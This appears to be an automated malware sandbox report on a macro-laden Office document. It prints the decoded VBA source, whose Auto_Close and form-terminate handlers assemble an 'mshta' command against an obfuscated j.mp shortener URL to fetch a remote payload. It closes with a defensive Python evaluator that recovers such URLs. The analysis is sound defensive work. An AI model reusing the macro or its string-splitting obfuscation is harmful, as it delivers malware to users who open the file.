Risk Score: 130 (MALICIOUS)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, including an Auto_Close macro, a common technique for executing malicious code when the document is closed. Auto_Close instantiates the class module sexy and calls its hhhhh method, which shows the UserForm lol; the form's UserForm_Terminate handler then passes the string returned by maviya1 to Shell. That string is assembled from short literals spread across four modules (maviya1, maviya3, lahab and their local variables) and resolves to "mshta " followed by the URL, so Shell launches mshta.exe against a remote HTA, most likely to download and run a second-stage payload. The constructed URL is http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd; the run of %40 (URL-encoded "@") characters before the real "@" is a bogus userinfo part that pushes the actual host, the j.mp link shortener, out of view. Note for dynamic analysis: the Shell call is only reached when the displayed form is closed, so a sandbox that never dismisses it will not observe the mshta launch.
Heuristics (5)
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: Shell maviya1
- Payload URL assembled from a Chr()/Asc() string expression (1 URL) (high, OLE_VBA_EXPR_DROPPER_URL): A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results, often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a URL with a valid host that does not already appear verbatim in the macro is reported, so a macro that merely contains a plain literal URL does not trigger this finding.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: AUtO_ClOsE()
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd: referenced by macro.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1503 bytes | 8345cb22770a79cfb36baa20e5983998d66f1c375ae793e1d67be6751191eb2d |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "sexy"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Sub hhhhh()
lol.Show
End Sub
Attribute VB_Name = "tutulpiii"
Function maviya1() As String
maviya2 = "m"
maviya1 = maviya2 + maviya3 + lahab
End Function
Attribute VB_Name = "hithithit"
Function maviya3()
yadeez1 = "s"
yadeez2 = "h"
yadeez3 = "t" + "a h" + "t"
maviya3 = yadeez1 + yadeez2 + yadeez3
End Function
Attribute VB_Name = "hullll"
Option Explicit
Sub _
AUtO_ClOsE()
Dim kasdok As sexy
Set kasdok = New sexy
With kasdok
End With
kasdok.hhhhh
End Sub
Attribute VB_Name = "lol"
Attribute VB_Base = "0{0912433B-95BC-45DF-8D58-BFA9C146EEFA}{C20D8037-E631-47F8-B93A-0DA16545D457}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Private Sub UserForm_Terminate()
Shell maviya1
End Sub
Attribute VB_Name = "putter"
Function lahab() As String
lahab1 = "tp://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/"
lahab2 = "djka" + "aah" + "dasdhkasj" + "asdhksdb" + "hd"
lahab = lahab1 + lahab2
End Function
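The following Python script is an added worked example, not part of this report or of the analyzer's own code. It implements a small bounded expression evaluator of the kind the OLE_VBA_EXPR_DROPPER_URL heuristic describes and runs it over the macro preview above, recovering the full Shell command line (mshta followed by the j.mp URL) that never appears contiguously in the source. The MACRO string is copied from the preview; the CONSTRUCTED input (using the reserved example.org host) is made up to show the Chr()/Asc()/StrReverse() style the heuristic mentions; all function and regex names are the example's own.

```python
"""Bounded evaluator for VBA string-building chains (added example, not the
analyzer's code). Folds literals, + and &, Chr()/Asc()/StrReverse(), substitutes
identifiers recursively and reports URLs that exist only after folding.
Assumption: each name is assigned once; scoping, types and control flow are ignored."""
import re

# Modules of macros.bas that feed the Shell call, copied from the preview on
# this page (Attribute lines and the Auto_Close/UserForm plumbing omitted).
MACRO = '''
Function maviya1() As String
maviya2 = "m"
maviya1 = maviya2 + maviya3 + lahab
End Function
Function maviya3()
yadeez1 = "s"
yadeez2 = "h"
yadeez3 = "t" + "a h" + "t"
maviya3 = yadeez1 + yadeez2 + yadeez3
End Function
Private Sub UserForm_Terminate()
Shell maviya1
End Sub
Function lahab() As String
lahab1 = "tp://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/"
lahab2 = "djka" + "aah" + "dasdhkasj" + "asdhksdb" + "hd"
lahab = lahab1 + lahab2
End Function
'''
# Constructed input (not from the page) in the Chr()/Asc()/StrReverse() style
# the heuristic describes; example.org is a reserved documentation host.
CONSTRUCTED = '''
Function u()
u = Chr(Asc("h")) + StrReverse("ptt") & "s://" & "exa" + "mple.org/x"
End Function
Sub go()
Shell(u, 0)
End Sub
'''

TOKEN = re.compile(r'\s*(?:("(?:[^"]|"")*")|(\d+)|([A-Za-z_]\w*)|([()+&,]))')
ASSIGN = re.compile(r'^\s*(?:(?:Public|Private)\s+)?(?:Const\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
SHELL = re.compile(r'^\s*(?:Call\s+)?Shell\s*\(?\s*(.+?)\)?\s*$', re.I)
URL = re.compile(r'[a-z][a-z0-9+.-]*://[^\s"\'<>]+', re.I)
MAX_DEPTH = 32  # bound on nested identifier substitution
BUILTINS = {'chr': lambda n: chr(int(n)),
            'asc': lambda s: ord(str(s)[0]),
            'strreverse': lambda s: str(s)[::-1]}

def tokenize(expr):
    toks, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f'unsupported syntax at {expr[pos:pos + 20]!r}')
        pos, (s, n, ident, op) = m.end(), m.groups()
        if s is not None:
            toks.append(('str', s[1:-1].replace('""', '"')))
        elif n is not None:
            toks.append(('num', int(n)))
        else:  # VBA identifiers are case-insensitive
            toks.append(('id', ident.lower()) if ident else ('op', op))
    return toks

def _concat(a, b):
    # VBA's + adds two numbers; otherwise (like &) it joins as text.
    return a + b if isinstance(a, int) and isinstance(b, int) else str(a) + str(b)

def _expr(toks, i, env, seen):
    val, i = _term(toks, i, env, seen)
    while i < len(toks) and toks[i] in (('op', '+'), ('op', '&')):
        rhs, i = _term(toks, i + 1, env, seen)
        val = _concat(val, rhs)
    return val, i

def _term(toks, i, env, seen):
    kind, val = toks[i]
    if kind in ('str', 'num'):
        return val, i + 1
    if (kind, val) == ('op', '('):
        inner, i = _expr(toks, i + 1, env, seen)
        return inner, i + 1  # step over ')'
    if kind != 'id':
        raise ValueError(f'unexpected token {toks[i]!r}')
    args, i = [], i + 1
    if i < len(toks) and toks[i] == ('op', '('):  # call syntax: gather arguments
        i += 1
        while i < len(toks) and toks[i] != ('op', ')'):
            arg, i = _expr(toks, i, env, seen)
            args.append(arg)
            if i < len(toks) and toks[i] == ('op', ','):
                i += 1
        i += 1
    if val in BUILTINS:
        return BUILTINS[val](*args), i
    return resolve(val, env, seen), i  # user function or variable: substitute its expression

def resolve(name, env, seen=()):
    """Fold the expression bound to name, substituting identifiers recursively."""
    if name not in env:
        raise KeyError(f'unresolved identifier {name}')
    if name in seen or len(seen) >= MAX_DEPTH:
        raise RecursionError(f'cyclic or too-deep reference via {name}')
    return _expr(tokenize(env[name]), 0, env, seen + (name,))[0]

def evaluate(expr, env=None):
    """Evaluate one VBA string expression against a name -> expression map."""
    return _expr(tokenize(expr), 0, env or {}, ())[0]

def collect_assignments(source):
    source = re.sub(r'\s_\r?\n\s*', ' ', source)  # join VBA line continuations
    return {m.group(1).lower(): m.group(2)
            for m in map(ASSIGN.match, source.splitlines()) if m}

def recover_shell_commands(source):
    """One record per Shell call: the folded command line and the URLs in it."""
    env, findings = collect_assignments(source), []
    for line in source.splitlines():
        m = SHELL.match(line)
        if not m:
            continue
        try:
            command = str(evaluate(m.group(1), env))
        except (KeyError, RecursionError, ValueError, IndexError) as err:
            findings.append({'line': line.strip(), 'command': None, 'error': str(err)})
            continue
        urls = URL.findall(command)
        findings.append({'line': line.strip(), 'command': command, 'urls': urls,
                         # self-validation: a URL already present verbatim in
                         # the source needed no folding, so it is not reported
                         'new_urls': [u for u in urls if u not in source]})
    return findings

if __name__ == '__main__':
    for src in (MACRO, CONSTRUCTED):
        for f in recover_shell_commands(src):
            print(f['line'], '->', f['command'], f.get('new_urls'))
```

Running the script prints the folded command for each Shell call, which for this sample is mshta followed by the j.mp URL; the cyclic-reference and depth guards in resolve are what keep the evaluator bounded on macros that reference themselves or chain hundreds of helpers, and the per-call error record makes such cases visible instead of aborting the scan.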